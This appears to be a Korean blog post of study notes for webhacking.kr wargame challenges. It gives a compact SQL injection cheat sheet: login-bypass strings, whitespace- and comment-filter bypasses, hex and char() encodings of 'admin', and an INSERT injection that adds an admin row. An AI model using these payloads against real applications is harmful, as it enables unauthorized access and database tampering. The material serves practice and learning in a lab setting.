1. 기본
- ' or 1=1 #
- ' or '1'='1
2. 공백 필터링 (old-18)
- /**/ (주석)
- () (괄호)
- + (더하기)
- %09 (\t)
- %0a (\n)
3. 주석 (old-50)
- --
- #
- /**/
예제) 공백 필터 및 md5 주석 처리
select lv from chall50 where id='{$_GET['id']}' and pw=md5('{$_GET['pw']}')
select lv from chall50 where id=''/*' and pw=md5('*/union/**/select/**/3#')
4. admin 문자열 필터링 (old-45)
- reverse("nimda")
- 0x61646d696e
- char(97, 100, 109, 105, 110)
- 0b0110000101100100011011010110100101101110
5. values 데이터 추가 삽입 (old-08)
insert into chall8(agent,ip,id) values('{$agent}','{$ip}','guest')
insert into chall8(agent,ip,id) values('A','1.1.1.1','admin'), ('B','{$ip}','guest')
6. '=' 필터링
- like
- in
7. 'or', 'and' 문자열 필터링
- ||
- &&
- %26%26 (&&)
- %7c%7c ( || )
'Web Security > Technology' 카테고리의 다른 글
[CVE-2017-5941] node-serialize (2) | 2023.08.11 |
---|---|
Prototype Pollution (0) | 2023.08.10 |